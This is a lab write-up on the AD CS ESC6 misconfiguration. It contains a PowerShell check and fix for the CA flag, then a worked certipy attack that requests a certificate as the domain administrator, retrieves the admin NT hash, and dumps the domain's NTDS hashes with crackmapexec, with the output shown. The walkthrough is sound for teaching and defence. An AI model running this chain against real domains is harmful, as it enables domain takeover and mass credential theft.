ADCS - ESC6

EDITF_ATTRIBUTESUBJECTALTNAME2 — ESC6

Another way to supply arbitrary SANs, described in a CQure Academy post, involves the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. As Microsoft describes, “If this flag is set on the CA, any request (including when the subject is built from Active Directory®) can have user defined values in the subject alternative name.” This means that ANY template configured for domain authentication that also allows unprivileged users to enroll (e.g., the default User template) can be abused to obtain a certificate that allows us to authenticate as a domain admin (or any other active user/machine). As this Keyfactor post describes, this setting “just makes it work”, which is why it’s likely flipped in many environments by sysadmins who don’t fully understand the security implications.

  • As stated on the Certipy page: “ESC6 is when the CA specifies the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. This flag allows the enrollee to specify an arbitrary SAN on all certificates despite a certificate template’s configuration.”

  • Because MARYLAND-CA is vulnerable to ESC6, we can perform the ESC1 attack with the User template instead of the ESC1 template, even though the User template has Enrollee Supplies Subject set to false.
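The CA-side check a defender would run for this flag, as an added example that is not from the original page or from Certipy: PowerShell run on the CA host that reads the policy module's EditFlags value from the registry, tests the EDITF_ATTRIBUTESUBJECTALTNAME2 bit (0x40000), and optionally clears it. The CA name MARYLAND-CA and host salisbury.maryland.local come from this lab; the function name is an assumption.

```powershell
# Added example: audit (and optionally remediate) EDITF_ATTRIBUTESUBJECTALTNAME2 on an AD CS CA.
# Run locally on the CA host as an administrator. The function name is an assumption.
function Test-Esc6EditFlags {
    param(
        [Parameter(Mandatory)] [string] $CaName,   # CA common name, e.g. MARYLAND-CA
        [switch] $Remediate
    )
    # EDITF_ATTRIBUTESUBJECTALTNAME2 is bit 0x40000 of the default policy module's EditFlags.
    $Esc6Bit = 0x40000
    $Key = "HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\$CaName\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy"
    $Flags = (Get-ItemProperty -Path $Key -Name EditFlags).EditFlags
    $Vulnerable = ($Flags -band $Esc6Bit) -ne 0
    if ($Vulnerable -and $Remediate) {
        # Clear only this bit; the CA service must restart for the change to take effect.
        Set-ItemProperty -Path $Key -Name EditFlags -Value ($Flags -band (-bnot $Esc6Bit))
        Restart-Service CertSvc
        $Flags = (Get-ItemProperty -Path $Key -Name EditFlags).EditFlags
        $Vulnerable = ($Flags -band $Esc6Bit) -ne 0
    }
    [pscustomobject]@{
        CA                   = $CaName
        EditFlags            = ('0x{0:X}' -f $Flags)
        ESC6_UserSuppliedSAN = $Vulnerable   # $true means any enrollee can set an arbitrary SAN
    }
}

# Equivalent certutil commands (certutil accepts the flag name with -setreg):
#   certutil -config "salisbury.maryland.local\MARYLAND-CA" -getreg policy\EditFlags
#   certutil -config "salisbury.maryland.local\MARYLAND-CA" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
#   net stop certsvc; net start certsvc
Test-Esc6EditFlags -CaName 'MARYLAND-CA'
```

Because the flag applies to every template the CA serves, clearing it on the CA is the fix; hardening individual templates does not close ESC6.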

Find the Vulnerability

sudo certipy find -u joaquin.Pereida@maryland.local -p 'horse' -vulnerable -dc-ip 192.168.56.12 -stdout
certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target salisbury.maryland.local -template User -ca MARYLAND-CA -upn administrator@maryland.local
certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12

Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@maryland.local': aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da

Dump the NTDS with CME

crackmapexec smb 192.168.56.12 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da' --ntds

SMB         192.168.56.12   445    BALTIMORE        [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BALTIMORE) (domain:maryland.local) (signing:True) (SMBv1:True)
SMB         192.168.56.12   445    BALTIMORE        [+] maryland.local\administrator:54296a48cd30259cc88095373cec24da (Pwn3d!)
SMB         192.168.56.12   445    BALTIMORE        [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         192.168.56.12   445    BALTIMORE        [+] Dumped 13 NTDS hashes to /home/watchdog/.cme/logs/BALTIMORE_192.168.56.12_2023-02-26_221347.ntds of which 10 were added to the database
SMB         192.168.56.12   445    BALTIMORE        [*] To extract only enabled accounts from the output file, run the following command: 
SMB         192.168.56.12   445    BALTIMORE        [*] cat /home/watchdog/.cme/logs/BALTIMORE_192.168.56.12_2023-02-26_221347.ntds | grep -iv disabled | cut -d ':' -f